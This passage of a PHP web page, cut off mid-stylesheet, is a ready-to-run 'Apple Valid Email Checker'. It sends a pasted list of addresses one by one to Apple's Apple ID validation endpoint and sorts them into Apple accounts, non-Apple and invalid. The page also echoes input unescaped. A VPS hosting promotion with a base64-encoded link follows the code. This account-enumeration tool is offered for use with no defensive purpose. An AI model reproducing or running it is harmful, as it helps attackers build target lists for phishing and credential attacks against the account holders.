255, 255, .8) inset; color: #707070; font-family: 'Open Sans', sans-serif; font-size: 12px; -webkit-font-smoothing: antialiased; font-weight: bold; margin: 0; outline: none; padding: 5px 10px; text-align: center; text-shadow: 0 1px 1px rgba(255, 255, 255, .5); } a.button:hover, button:hover, input[type='submit']:hover { background: #f1f1f1; background: -moz-linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3; background: -webkit-gradient(linear, left top, left bottom, from(#f6f6f6), to(#e3e3e3)) #e3e3e3; background: linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3; cursor: pointer; } a.button:focus, button:focus, input[type='submit']:focus { background: -moz-linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3; background: -webkit-gradient(linear, left top, left bottom, from(#f6f6f6), to(#e3e3e3)) #e3e3e3; background: linear-gradient(top, #f6f6f6, #e3e3e3) #e3e3e3; border: 1px solid #80bfff; -moz-box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset; -webkit-box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset; box-shadow: 0 0 3px #80bfff, 0 1px 1px rgba(255, 255, 255, .8) inset; } a.button:active, a.button.active, button:active, button.active, input[type='submit']:active, input[type='submit'].active { background: #e3e3e3; background: -moz-linear-gradient(top, #e3e3e3, #f6f6f6) #1b468f; background: -webkit-gradient(linear, left top, left bottom, from(#e3e3e3), to(#f6f6f6)) #1b468f; background: linear-gradient(top, #e3e3e3, #f6f6f6) #1b468f; -moz-box-shadow: none; -webkit-box-shadow: none; box-shadow: none; } --></style> <title>Apple Valid Email Checker</title> </head><div align=\"center\"></center>"; $emails = $_POST['emails']; print ' <div id="form-container"> <form method="POST"> <p align="center"><font face="Times New Roman" size="6">Apple Valid Email Checker</font></p> <p><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p> <p><input type="submit" value="Submit" name="B1"></p> </form> </div>'; if (!empty($emails)) { $emails = explode("\r\n", $emails); $yes = 0; $not = 0; $inv = 0; $count = 1; print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">"; foreach ( $emails as $email ) { $email = trim($email); print $count .". Checking <b><font color=\"#FFFFFF\">".$email."</font> ..... </b>"; $count++; if(filter_var($email, FILTER_VALIDATE_EMAIL)){ $_CheckAction = @file_get_contents('https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa/wa/validateAppleID?appleid='.$email.'') or Die('<b><font color="#FF0000">Server Error - Can\'t Check </font></b>'); if(!preg_match("/111/",$_CheckAction)) { print "<font size=\"3\" color=\"#7FFF00\">Yes</font> <br>"; $yes++; $vaild_yes .=$email."\n"; } else { print "<font color=\"#FF0000\">NO</font><br>"; $not++; $vaild_no .=$email."\n"; } } else { print "<font color=\"#FF0000\">Invaild email</font><br>"; $inv++; $invaild .=$email."\n"; } } print '<p><table border="0" width="100%"> <tr> <td><p align="center"><font face="Times New Roman" size="4">Apple emails</font> <b>(<font color="#7FFF00"><b>'.$yes.'</b></font>)</b> </p></td> <td><p align="center"><font face="Times New Roman" size="4">Not Apple emails</font> <b>(<font color="#FF0000">'.$not.'</font>)</b> </p> </td> <td><p align="center"><font face="Times New Roman" size="4">Invalid emails</font> <b>(<font color="#FF0000">'.$inv.'</font>)</b> </p> </td> </tr> <tr> <td><div id="form-container1"><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></div></td> <td><div id="form-container1"><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></div></td> <td><div id="form-container1"><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></div></td> </tr> </table></p>' ; } ?>

Please use the promotion code "dbm_free" to get one year free VPS hosting. Maximum one package per client. We will verify all orders manually. Please provide non-free email address or social network account in order to pass our verification. aHR0cDovL3d3dy52cHMtbWFydC5jb20vV2luZG93cy1WUFMuYXNweA==